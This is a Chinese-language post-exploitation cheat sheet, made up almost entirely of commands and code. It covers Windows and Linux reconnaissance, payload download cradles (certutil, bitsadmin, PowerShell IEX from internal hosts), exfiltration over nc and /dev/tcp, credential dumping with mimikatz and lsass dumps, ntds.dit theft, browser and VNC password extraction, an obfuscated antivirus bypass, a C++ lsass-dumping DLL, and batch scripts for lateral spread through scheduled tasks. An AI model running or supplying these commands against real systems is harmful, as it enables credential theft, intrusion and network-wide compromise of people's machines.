Linux 操作系统&内核版本&环境变量
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Root权限进程
>ps aux | grep root
>ps -ef | grep root
计划任务
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP信息
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
连接信息
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
用户信息
>id
>whomi
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 列出超级用户
>awk -F: '($3 == "0") {print}' /etc/passwd #列出超级用户
>cat /etc/sudoers
>sudo –l
操作记录
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
可写目录
>find / -writable -type d 2>/dev/null # 可写目录
>find / -perm -222 -type d 2>/dev/null # 可写目录
>find / -perm -o w -type d 2>/dev/null # 可写目录
>find / -perm -o x -type d 2>/dev/null # 可执行目录
>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # 可写可执行目录
HTTP服务 >python2 -m SimpleHTTPServer
>python3 -m http.server 8080
>php -S 0.0.0.0:8888
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
>openssl s_server -key key.pem -cert cert.pem -accept 443 –WWW
>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start"
>ruby -run -e httpd . -p 8888
文件操作 Windows查找文件 >cd /d E: && dir /b /s index.php
>for /r E:\ %i in (index*.php) do @echo %i
>powershell Get-ChildItem d:\ -Include index.php -recurse
Linux查找文件
#find / -name index.php
查找木马文件
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('
创建 读文本文件:
>file = Get-Content "1.txt"
>file
>powershell Set-content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"
压缩 >rar.exe a –k –r –s –m3 C:\1.rar C:\wwwroot
>7z.exe a –r –p12345 C:\1.7z C:\wwwroot
解压 >rar.exe e c:\wwwroot\1.rar
>7z.exe x –p12345 C:\1.7z –oC:\wwwroot
传输
FTP >open 192.168.0.98 21
>输入账号密码
>dir查看文件
>get file.txt
VBS #1.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056//忽略HTTPS错误
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe"
ado.Close
JS var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe
Bitsadmin >bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "
Powershell 1 注意:内核5.2以下版本可能无效
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
2 PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3 >powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4 高版本
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt –UseBasicParsing
5 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates
>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"
Certutil >certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
对文件进行编码下载后解码执行
>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成经base64编码的exe
>certutril -urlcache -split -f http://192.168.0.107/1.txt & certurl -decode 1.txt ms.exe & ms.exe
Python #python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://192.168.1.192/Client.exe", "1.exe");
PHP
#!/usr/bin/php
<?php $data = @file("http://192.168.1.192/Client.exe");
$lf = "1.exe";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>
Curl #curl -o 1.exe http://192.168.1.192/Client.exe
wget #wget http://192.168.1.192/Client.exe
#wget –b后台下载
#wget –c 中断恢复
nc >nc –lvnp 333 >1.txt
目标机
>nc –vn 192.168.1.2 333 <test.txt –q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333
SCP
Linux中传输文件
>scp -P 22 file.txt user@1.1.1.1:/tmp
Hash&密码 破解网址 https://www.objectif-securite.ch/en/ophcrack
http://cracker.offensive-security.com/index.php
GoogleColab破解hash
之前在freebuf上看到过相关文章,最近在github上也看到了这个脚本,所以拿起来试试,速度可观
https://www.freebuf.com/geek/195453.html
https://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a
打开
https://drive.google.com/drive
新建一个文件夹,右键,更多选择google Colab
如果没有,点关联更多应用,搜索这个名字,安装一下即可
安装hashcat,下载字典
运行类型选择GPU加速
这里测试个简单密码
12亿条密码大概20多分钟
https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
以上是字典
密码策略
默认情况,主机账号的口令每30天变更一次
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters,键值为DisablePasswordChange,设置为1,即表示禁止修改账号口令
>组策略(gpedit.msc)中修改默认的30天,修改位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"设置为0时,表示无限长
>禁止修改主机账号口令,用来支持VDI (virtual desktops)等类型的使用,具体位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"
Debug Privilege
本地安全策略>本地策略>用户权限分配>调试程序
开启Wdigest Cmd
>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell
>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter
>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1
Getpass
>getpassword.exe>1.txt
QuarksPwDump
>QuarksPwDump.exe -dump-hash-local
MSF
Meterpreter > run hashdump
&
Meterpreter > mimikatz_command -f samdump::hashes
&
Meterpreter > load mimikatz
Meterpreter > wdigest
&
Meterpreter > load mimikatz
Meterpreter > msv
Meterpreter > kerberos
&
Meterpreter > load kiwi
Meterpreter > creds_all
&
Meterpreter > migrate PID
Meterpreter > load mimikatz
Meterpreter > mimikatz_command -f sekurlsa::searchPasswords
&
Meterpreter > run windows/gather/smart_hashdump
Empire
>usemodule credentials/mimikatz/dcsync_hashdump
Invoke-Dcsync
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync
Mimikatz 调用mimikatz远程抓取 抓明文
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
抓hash
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt
横向批量抓hash Schtasks 把IP列表放入ip.txt文件中,通过一个账户密码批量net use与列表里的IP建立连接,如果建立连接没出错的话,复制getpass到目录temp目录,使用账户密码远程创建计划任务名字为windowsupdate,指定每日00:00以system权限执行getpass文件,创建完计划任务后,/tn是立刻执行此计划任务,执行完后删除此计划任务,ping -n 10>nul是程序停留,相当于延时10秒,之后复制文件到本地,接着删除getpass文件,删除创建的连接。
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic >for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
直接使用 >mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
记录的结果在c:\windows\system32\mimilsa.log
>mimikatz log "privilege::debug" "lsadump::lsa /patch"
>mimikatz !privilege::debug
>mimikatz !token::elevate
>mimikatz !lsadump::sam
Powershell Bypass >powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
.net 2.0 katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
Powershell执行
>$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
>$Content = [System.Convert]::FromBase64String($key)
>Set-Content key.snk -Value $Content –Encoding Byte
Cmd执行
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild >C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml
JScript >wmic os get /format:"mimikatz.xsl"
>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz >procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
>procdump.exe -accepteula -ma lsass.exe lsass.dmp
>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert https://github.com/outflanknl/Dumpert
有三种,分别是dll,可执行文件和cs的Aggressor插件,这里测试下dll和exe
DLL的执行方式是
rundll32.exe C:\Outflank-Dumpert.dll,Dump
文件保存在c:\windows\temp\dumpert.dmp
用mimikatz
>sekurlsa::mimidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords
可执行文件就直接执行就可以了
绕过卡巴斯基 https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
将三个文件下载到本地,使用visual studio 进行编译,需要修改了几个地方。
(1)添加如下代码
#pragma comment (lib , "Rpcrt4 .lib ") (引入Rpcrt4 .lib 库文件)
(2)将.c 文件后缀改成.cpp (使用了c ++代码,需要更改后缀)
(3) 编译时选择x64
编译得到exe 文件
Visual studio 创建c ++空项目
配置类型选dll
字符集选Unicode ,调试器选64位
Dll 保存在C :\\windows \\temp \\1.bin
#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <string>
#include <map>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib" )
using namespace std ;
int FindPID ()
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof (pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0 );
if (hProcessSnap == INVALID_HANDLE_VALUE) {
cout << "CreateToolhelp32Snapshot Error!" << endl ;;
return false ;
}
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult)
{
if (_wcsicmp(pe32.szExeFile, L"lsass.exe" ) == 0 )
{
return pe32.th32ProcessID;
}
bResult = Process32Next(hProcessSnap, &pe32);
}
CloseHandle(hProcessSnap);
return -1 ;
}
typedef HRESULT (WINAPI* _MiniDumpW) (
DWORD arg1, DWORD arg2, PWCHAR cmdline) ;
typedef NTSTATUS (WINAPI* _RtlAdjustPrivilege) (
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled) ;
int dump () {
HRESULT hr;
_MiniDumpW MiniDumpW;
_RtlAdjustPrivilege RtlAdjustPrivilege;
ULONG t;
MiniDumpW = (_MiniDumpW)GetProcAddress(
LoadLibrary(L"comsvcs.dll" ), "MiniDumpW" );
RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
GetModuleHandle(L"ntdll" ), "RtlAdjustPrivilege" );
if (MiniDumpW == NULL ) {
return 0 ;
}
RtlAdjustPrivilege(20 , TRUE, FALSE, &t);
wchar_t ws[100 ];
swprintf(ws, 100 , L"%hd%hs" , FindPID(), " C:\\windows\\temp\\1.bin full" );
MiniDumpW(0 , 0 , ws);
return 0 ;
}
BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
dump();
break ;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break ;
}
return TRUE;
}
>xxx.exe c:\xx\xx\xx.dll使用绝对路径
远程LSASS进程转储-Physmem2profit https:
mimikatz被多数安全人员用来获取凭据,但现在的AV/EDR很轻易的识别并查杀,这里不在服务器端使用mimikatz,远程对lsass进程进行转储。
服务器端直接使用visual studio构建
physmem2profit-public \server\
客户端
> git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
客户端这里先安装
> bash physmem2profit/client/install.sh
需要将此文件
https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys
传到目标服务器,我这里存放在c:\windows\temp\中
服务器端执行
>Physmem2profit.exe --ip 192.168.0.98 --port 8888 –verbose这里的IP是服务器端IP
攻击端安装所需模块
攻击端执行
> source physmem2profit/client/.env/bin/activate
> cd physmem2profit/client
> python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test
服务器端可以看到
把生成的dmp文件转移到win系统上使用mimikatz即可获得hash ,当然也可以在linux上使用pypykatz。
再来一条转储lsass 进程的命令
要以system 权限执行
>rundll32 .exe C :\Windows \System32 \comsvcs .dll MiniDump <lsass pid > lsass .dmp full
SqlDumper+mimikatz 位置C:\Program Files\Microsoft SQL Server\number\Shared
> tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号
> Sqldumper.exe ProcessID PID 0x01100 导出mdmp文件
> mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin 抓取linux下hash,root权限
https:
缓存hash提取
注册表 > reg save hklm\sam c:\sam.hive ® save hklm\system c:\system.hive ® save hklm\security c:\security.hive
> mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit
Ninjacopy # http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1
> powershell -exec bypass
> Import-Module .\invoke-ninjacopy.ps1
> Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
> Invoke-NinjaCopy –Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
> Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
> Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"
Quarks-pwdump > quarks-pwdump.exe –dump-hash-domain
域hash提取 Ntdsutil > ntdsutil
> snapshot
> activate instance ntds
> create
> mount {guid}
> copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit
> unmount {guid}
> delete {guid}
> quit
&
创建
> ntdsutil snapshot “activate instance ntds” create quit quit
挂载
> ntdsutil snapshot “mount {guid}” quit quit
复制
> copy c:\$SNAP_XXX_VOLUMEC $\windows\NTDS\ntds.dit d:\ntds_save.dit
卸载并删除
> ntdsutil snapshot “unmounts {guid}” “delete {guid}” quit quit
删除后检测
> ntdsutil snapshot “List All” quit quit
提取hash
> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit
Vssadmin 创建C盘卷影拷贝
> vssadmin create shadow /for =c:
复制ntds.dit
> copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit
删除拷贝
> vssadmin delete shadows /for =c: /quiet
Impacket Impacket中的secretsdump.py
或
NTDSDumpex > Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
> reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hive
https://github.com/zcgonvh/NTDSDumpEx
> NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
WMI调用Vssadmin > wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
> wmic /node:dc /user:P xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
> wmic /node:dc /user: xxxx\admin /password: passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive
C:\temp
PowerSploit PS >Import-Module .\VolumeShadowCopyTools.ps1
PS >New-VolumeShadowCopy -Volume C:\
PS >Get-VolumeShadowCopy
Nishang PS >Import-Module .\Copy-VSS.ps1
PS >Copy-VSS
PS >Copy-VSS -DestinationDir C:\ShadowCopy\
或MSF中
Meterpreter>load powershell
Meterpreter>powershell_import /root/Copy-VSS.ps1
Meterpreter>powershell_execute Copy-VSS
Mimikatz MSF # use auxiliary/admin/smb/psexec_ntdsgrab
# set rhost smbdomain smbuser smbpass
# exploit
Ntds.dit文件存在/root/.msf4/loot
后渗透模块
# use windows/gather/credentials/domain_hashdump
# set session 1
laZagne windows https://github.com/AlessandroZ/LaZagne
> laZagne.exe all -oN获取所有密码输出到文件
Powershell
PS> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS> $vault = New-Object Windows.Security.Credentials.PasswordVault
PS> $vault .RetrieveAll() | % { $_ .RetrievePassword();$_ }
Linux 敏感信息 Seatbelt 使用Visual studio编译
> Seatbelt.exe ALL获取所有信息
VNC密码 >reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
http: //www.cqure.net/wp /tools/password -recovery/vncpwdump/
解密
Navicat信息 > reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
> reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
> reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
离线破解
https://github.com/HyperSine/how-does-navicat-encrypt-password
Chrome保存的密码 > mimikatz dpapi::chrome /in :"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
Foxmail X :\Foxmail\storage\xxx\Accounts\Account.rec0
使用
Foxmail Password Decryptor解密
https ://securityxploded.com/foxmail-password-decryptor.php
firefox保存的密码 https:
>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"
或
>dir %appdata%\Mozilla \Firefox \Profiles \
>dir %appdata%\Mozilla \Firefox \Profiles \yn80ouvt.default
需先结束firefox.exe进程
压缩
>7z.exe -r -padmin123 a c :\users\public \firefox.7z C :\Users \Administrator \AppData \Roaming \Mozilla \*.*
https:
https:
SecureCRT C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夹
C:\program files\Vandyke software\securecrt\
https://github.com/uknowsec/SharpDecryptPwd
横向 探测存活主机 For+Ping命令查询存活主机
>for /L %I in (1 ,1 ,254 ) DO @ping -w 1 -n 1 192.168 .0 .%I |findstr "TTL="
For+Ping命令查询域名对应IP
>for /f "delims=" %i in (D :/domains.txt) do @ping -w 1 -n 1 %i | findstr /c :"[192." >> c :/windows/temp/ds.txt
NbtScan Windows
>nbtscan.exe -m 192.168.1.0 /24
Linux
NMAP #nmap -Pn -open -A -n -v -iL filename.txt
-Pn:跳过主机发现
-n:不做DNS解析
-open:只显示开启的端口
-A:扫描过程中,输入回车,可以查看扫描进度
-v:显示详细信息
-F:快速扫描100个常见端口
-p:选择要扫描的端口 例:-p1-65535 (全端口扫描,中间没有空格)
-iL:为程序指定一个要扫描的IP列表
-sV:探测开放端口的服务和版本信息
-T可以选择扫描等级,默认T3,但想快点话,可以输入 -T4
存活主机
>nmap -sP -PI 192.168.0.0/24
>nmap -sn -PE -T4 192.168.0.0/24
>nmap -sn -PR 192.168.0.0/24
代理nmap扫描 meterpreter > background
msf > use auxiliary/server/socks4a
再配置proxychains.conf
NetDiscover rp-scan
kali
> arp-scan --interface=wlan0 -localnet
Windows
> arp-scan.exe -t 192.168.0.0/24
MSF
# use auxiliary/scanner/netbios/nbname
meterpreter> run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24
meterpreter> run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24
探测服务&端口 常见端口
服务 端口 Mssql 1433 SMB 445 WMI 135 winrm 5985 rdp 3389 ssh 22 oracle 1521 mysql 3306 redis 6379 postgresql 5432 ldap 389 smtp 25 pop3 110 imap 143 exchange 443 vnc 5900 ftp 21 rsync 873 mongodb 27017 telnet 23 svn 3690 java rmi 1099 couchdb 5984 pcanywhere 5632 web 80-90,8000-10000,7001,9200,9300
Powershell Powersploit > powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 –T 4 -Ports '1-65535' -oA C:\TEMP.txt"
Nishang > powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"
去掉scanport就是探测存活
SMB MSF NMAP #nmap -sU -sS --script smb-enum-shares .nse -p 445 192.168 . 1.119
CMD > for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445
Linux Samba服务 端口一般139,弱口令连接
> smbclient -L 192.168.0.110
> smbclient '\\192.168.0.110\IPC$'
# use exploit/linux/samba/is_known_pipenamea
MSF 端口 服务 Nc >nc -znv 192.168 .0 .98 1-65535
> nc -v -w 1 192.168.0.110 -z 1-1000
> for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
Masscan $ sudo apt-get install clang git gcc make libpcap-dev
$ git clone https://github.com/robertdavidgraham/masscan
$ cd masscan
$ make
> masscan -p80,3389,1-65535 192.168.0.0/24
PTScan 友好识别web服务
https:
>python PTscan.py {-f /xxx/xxx.txt or -h 192.168 .1 } [-p 21 ,80 ,3306 ] [-m 50 ] [-t 10 ] [-n(不ping)] [-b(开启banner扫描)] [-r查找IP]
80 ,81 ,82 ,83 ,84 ,85 ,86 ,87 ,88 ,89 ,90 ,91 ,901 ,18080 ,8080 ,8081 ,8082 ,8083 ,8084 ,8085 ,8086 ,8087 ,8088 ,8089 ,8090 ,443 ,8443 ,7001
CobaltStrike+K8 Aggressor 存活主机 beacon> Cscan 192.168.0.0/24 OnlinePC
MS17010 beacon> Cscan 192.168.0.0/24 MS17010
操作系统信息 beacon> Cscan 192.168.0.0/24 Osscan
内网站点banner、标题扫描 beacon> Cscan 192.168.0.0/24 WebScan
FTP爆破 上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd )
beacon>Cscan 192.168.0.0/24 FtpScan
WMI爆破windows账户密码 上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd )
beacon>Cscan 192.168.0.0/24 WmiScan
思科设备扫描 beacon> Cscan 192.168.0.0/24 CiscoScan
枚举共享 枚举SQL SERVER数据库 执行命令&IPC&计划任务 建立连接
>net use \\192.168 .1.2 \ipc$ "password" /user:domain\administrator
查看连接
>net use
列文件
>dir \\192.168 .1.2 \c$
查看系统时间
>net time \\192.168 .1.2
上传文件
>copy 1 .exe \\192.168 .1.2 \c$
下载文件
>copy \\192.168 .1.2 \c$\1 .exe 1 .exe
批量IPC
@echo off
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd
:end
exit
AT Schtasks > net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
> copy 1.exe \\192.168.1.2\c$
> net time \\192.168.1.2
> at \\192.168.1.2 1:00AM c:\1.exe
> at \\192.168.1.2 1:00AM cmd.exe /c “ipconfig >c:/1.txt”
> type \\192.168.1.2\c$\1.txt
查看计划任务
> at \\192.168.1.2
删除计划任务
> at \\192.168.1.2 计划ID /delete
横向批量上线
